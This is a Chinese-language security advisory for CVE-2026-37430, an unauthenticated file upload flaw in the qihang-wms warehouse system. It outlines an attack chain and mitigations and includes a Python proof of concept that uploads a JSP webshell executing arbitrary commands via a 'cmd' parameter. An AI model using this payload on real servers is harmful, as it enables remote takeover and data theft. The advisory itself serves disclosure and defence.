CVE-2026-37430 CVSS 7.3 高危

CVE-2026-37430 qihang-wms任意文件上传漏洞

披露日期: 2026-05-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-37430

漏洞类型

任意文件上传

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

qihang-wms (启航电商WMS)

漏洞概述

qihang-wms（启航电商WMS）系统的ShopOrderImportController组件存在任意文件上传漏洞。由于系统未严格校验上传文件的类型和内容，未经身份认证的远程攻击者可上传恶意文件，导致服务器执行任意代码，存在极高风险。

技术细节

该漏洞根源在于qihang-wms项目中的ShopOrderImportController.java组件未能正确处理文件上传请求。开发人员未对用户传入的文件名后缀、Content-Type以及文件内容进行白名单校验。攻击者可利用此缺陷，向服务器发送特制的POST数据包，上传包含恶意代码的JSP文件。由于该漏洞无需用户交互且无需身份认证（CVSS:3.1/AV:N/AC:L/PR:N/UI:N），攻击者可轻易获取Webshell权限，进而控制整个服务器，造成数据泄露或系统瘫痪。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描并识别互联网上运行qihang-wms系统的目标，确认ShopOrderImportController接口可访问。

STEP 2

2. 漏洞利用

攻击者构造包含恶意JSP脚本的HTTP POST请求，发送至文件上传接口，绕过验证机制上传Webshell。

STEP 3

3. 代码执行

攻击者通过浏览器访问已上传的恶意文件路径，触发服务器端解析，执行任意系统命令。

STEP 4

4. 权限维持

攻击者利用获取的服务器权限植入后门，进一步窃取数据或横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Example)
target_url = "http://target.com/api/shopOrder/import"

# Malicious JSP Webshell content
shell_content = '<%@ page import="java.io.*" %><%Runtime.getRuntime().exec(request.getParameter("cmd"));%>'

# Prepare the file payload
files = {
    'file': ('exploit.jsp', shell_content, 'application/octet-stream')
}

try:
    # Send the malicious upload request
    response = requests.post(target_url, files=files, timeout=10)

    if response.status_code == 200:
        print("[+] File uploaded successfully.")
        print("[+] Access the shell at: http://target.com/path/to/exploit.jsp?cmd=whoami")
    else:
        print("[-] Upload failed. Status code:", response.status_code)
except Exception as e:
    print("[-] Error occurred:", str(e))

影响范围

qihang-wms (commit 75c15a)

防御指南

临时缓解措施

建议立即检查系统是否存在ShopOrderImportController组件，并暂时禁用相关文件导入功能。在Web服务器层面（如Nginx）配置规则，禁止解析上传目录下的JSP/ASP/PHP等动态脚本文件。同时，部署Web应用防火墙（WAF）以拦截异常的文件上传请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表